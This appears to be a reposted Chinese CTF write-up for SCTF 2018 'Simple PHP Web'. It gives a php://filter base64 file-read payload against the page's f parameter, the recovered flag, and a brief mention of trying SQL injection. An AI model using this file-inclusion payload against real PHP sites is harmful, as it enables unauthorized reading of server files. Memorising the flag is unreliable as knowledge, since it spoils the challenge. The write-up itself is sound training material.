码迷,mamicode.com
首页 > Web开发 > 详细

bmzctf刷题 SCTF 2018_Simple PHP Web

时间:2021-06-18 19:12:05      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:targe   注入   txt   其他   erro   alt   rip   文件   解法   

bmzctf刷题 SCTF 2018_Simple PHP Web

技术图片

正常解法

一眼就可以看出/f=login.php
直接文件读取
技术图片
失败

尝试伪协议读取
payload
?f=php://filter/read=convert.base64-encode/resource=/flag
技术图片

base64解码后
BMZCTF{fb169f79d7e64512bb272aad5dab2b1a}
OVER

其他的尝试

看到这两个框框。。。

sql注入

好吧,不用试了
技术图片

<script> alert(/login error!/)</script>

bmzctf刷题 SCTF 2018_Simple PHP Web

标签:targe   注入   txt   其他   erro   alt   rip   文件   解法   

原文地址:https://www.cnblogs.com/murkuo/p/14897169.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!